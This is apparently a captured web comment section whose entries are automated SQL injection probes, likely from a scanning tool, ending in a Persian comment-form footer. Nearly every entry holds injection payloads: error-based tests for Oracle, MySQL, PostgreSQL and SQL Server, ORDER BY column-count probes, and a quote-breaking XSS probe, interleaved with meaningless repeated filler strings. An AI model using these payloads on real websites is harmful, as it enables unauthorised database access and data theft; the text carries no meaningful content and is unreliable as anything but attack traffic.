eMrh' AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'vQpR'='vQpR eMrh' AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'vQpR'='vQpR

tgYS


eMrh) AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND (2431=2431 eMrh) AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND (2431=2431

tgYS


eMrh AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) eMrh AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)

tgYS


eMrh AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)-- hBsh eMrh AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)-- hBsh

tgYS


eMrh') ORDER BY 1-- npjD eMrh') ORDER BY 1-- npjD

tgYS


eMrh') ORDER BY 6853-- Mpet eMrh') ORDER BY 6853-- Mpet

tgYS


eMrh' ORDER BY 1-- sRzZ eMrh' ORDER BY 1-- sRzZ

tgYS


eMrh' ORDER BY 4080-- PYpB eMrh' ORDER BY 4080-- PYpB

tgYS


eMrh) ORDER BY 1-- qrtS eMrh) ORDER BY 1-- qrtS

tgYS


eMrh) ORDER BY 6788-- XhCz eMrh) ORDER BY 6788-- XhCz

tgYS


eMrh ORDER BY 1-- CamU eMrh ORDER BY 1-- CamU

tgYS


eMrh ORDER BY 7712-- JvkX eMrh ORDER BY 7712-- JvkX

tgYS


eMrh ORDER BY 1-- HwAq eMrh ORDER BY 1-- HwAq

tgYS


eMrh ORDER BY 3200-- RcPE eMrh ORDER BY 3200-- RcPE

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh eMrh

tgYS.')).,.,".


eMrh eMrh

tgYS'EqastA<'">Mxxnkg


eMrh eMrh

tgYS') AND EXTRACTVALUE(6858,CONCAT(0x5c,0x7171627871,(SELECT (ELT(6858=6858,1))),0x7171786b71)) AND ('UBGM'='UBGM


eMrh eMrh

tgYS' AND EXTRACTVALUE(6858,CONCAT(0x5c,0x7171627871,(SELECT (ELT(6858=6858,1))),0x7171786b71)) AND 'rWgy'='rWgy


eMrh eMrh

tgYS) AND EXTRACTVALUE(6858,CONCAT(0x5c,0x7171627871,(SELECT (ELT(6858=6858,1))),0x7171786b71)) AND (8938=8938


eMrh eMrh

tgYS AND EXTRACTVALUE(6858,CONCAT(0x5c,0x7171627871,(SELECT (ELT(6858=6858,1))),0x7171786b71))


eMrh eMrh

tgYS AND EXTRACTVALUE(6858,CONCAT(0x5c,0x7171627871,(SELECT (ELT(6858=6858,1))),0x7171786b71))-- cCpi


eMrh eMrh

tgYS') AND 4236=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (4236=4236) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND ('Iygp'='Iygp


eMrh eMrh

tgYS' AND 4236=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (4236=4236) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND 'vcaY'='vcaY


eMrh eMrh

tgYS) AND 4236=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (4236=4236) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND (4748=4748


eMrh eMrh

tgYS AND 4236=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (4236=4236) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC)


eMrh eMrh

tgYS AND 4236=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (4236=4236) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC)-- wclS


eMrh eMrh

tgYS') AND 2162 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2162=2162) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) AND ('rQWA'='rQWA


eMrh eMrh

tgYS' AND 2162 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2162=2162) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) AND 'aOtk'='aOtk


eMrh eMrh

tgYS) AND 2162 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2162=2162) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) AND (3869=3869


eMrh eMrh

tgYS AND 2162 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2162=2162) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)))


eMrh eMrh

tgYS AND 2162 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2162=2162) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)))-- SPCo


eMrh eMrh

tgYS') AND 6622=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (6622=6622) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('EdkS'='EdkS


eMrh eMrh

tgYS' AND 6622=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (6622=6622) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'ecDm'='ecDm


eMrh eMrh

tgYS) AND 6622=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (6622=6622) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND (4648=4648


eMrh eMrh

tgYS AND 6622=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (6622=6622) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)


eMrh eMrh

tgYS AND 6622=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (6622=6622) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)-- ddrJ


eMrh eMrh

tgYS') ORDER BY 1-- pVSf


eMrh eMrh

tgYS') ORDER BY 6299-- qSnJ


eMrh eMrh

tgYS' ORDER BY 1-- vxim


eMrh eMrh

tgYS' ORDER BY 8239-- SbgY


eMrh eMrh

tgYS) ORDER BY 1-- hkei


eMrh eMrh

tgYS) ORDER BY 9410-- dbwR


eMrh eMrh

tgYS ORDER BY 1-- KEmi


eMrh eMrh

tgYS ORDER BY 3641-- HTsD


eMrh eMrh

tgYS ORDER BY 1-- KMwA


eMrh eMrh

tgYS ORDER BY 4319-- KXKk


ثبت نظر

آدرس ایمیل شما منتشر نخواهد شد. قسمت های مورد نیاز علامت گذاری شده اند *